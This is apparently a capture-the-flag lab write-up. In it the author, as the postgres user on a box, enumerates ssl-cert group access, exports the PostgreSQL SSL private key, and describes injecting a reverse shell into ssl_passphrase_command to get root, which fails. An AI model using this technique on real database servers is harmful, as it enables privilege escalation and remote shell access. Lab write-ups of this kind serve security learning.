InfoSec LAB

Download_ssl-cert

Created: 2 min read

ssl-cert

postgres@download:~$ id
uid=113(postgres) gid=118(postgres) groups=118(postgres),117(ssl-cert)

After gaining a lateral movement to the postgres account, I checked the membership of the current user The user is part of the ssl-cert group. This was initially showed up way earlier during the Initial Foothold phase

postgres@download:~$ find / -group ssl-cert -ls 2>/dev/null
    55052      4 drwx--x---   2 root     ssl-cert     4096 jul 19 15:35 /etc/ssl/private

Checking the filesystem for any relevant file or directory revealed a single directory; /etc/ssl/private interestingly, i can only execute despite of the group ownership; root:ssl-cert

postgres@download:~$ cd /etc/ssl/private
postgres@download:/etc/ssl/private$ ll
ls: cannot open directory '.': Permission denied

That means listing files within the directory as well.

RCE via ssl-cert (failed)

Checking an online resource reveals an interesting approach for code execution by abusing the membership to the ssl-cert group Following through

postgres@download:~$ cat /etc/postgresql/12/main/postgresql.conf | grep -i 'ssl_*'
# - SSL -
ssl = on
#ssl_ca_file = ''
ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'
#ssl_crl_file = ''
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
#ssl_ciphers = 'HIGH:MEDIUM:+3DES:!aNULL' # allowed SSL ciphers
#ssl_prefer_server_ciphers = on
#ssl_ecdh_curve = 'prime256v1'
#ssl_min_protocol_version = 'TLSv1'
#ssl_max_protocol_version = ''
#ssl_dh_params_file = ''
#ssl_passphrase_command = ''
#ssl_passphrase_command_supports_reload = off

Checking the SSL configuration in the postgresql.conf file, which I initially checked but skipped a few

postgres@download:~$ openssl rsa -aes256 -in /etc/ssl/private/ssl-cert-snakeoil.key -out ./ssl-cert-snakeoil.key
writing RSA key
Enter PEM pass phrase: passphrase
Verifying - Enter PEM pass phrase: passphrase
postgres@download:~$ mv ./ssl-cert-snakeoil.key /tmp/
postgres@download:~$ stat -Lc '%a %A' /tmp/ssl-cert-snakeoil.key 
600 -rw-------

I just need to export the existing key; /etc/ssl/private/ssl-cert-snakeoil.key Additionally, a passphrase must be given during the export process I also need to make sure that the exported key has the correct permission bit set

Now I just need to modify the SSL part of the configuration file, postgresql.conf

Above is the original statement

and this is the changed version. (with a reverse shell command and passphrase into the ssl_passphrase_command attribute)

I waited on the other end for a shell session because I initially believed that the root cronjob process would execute the reloading for me However, it never happens

Although I am able to reload the configuration all by myself within the psql session, I only get a shell back as the same user This is a deadend

Interactive Graph View

Backlinks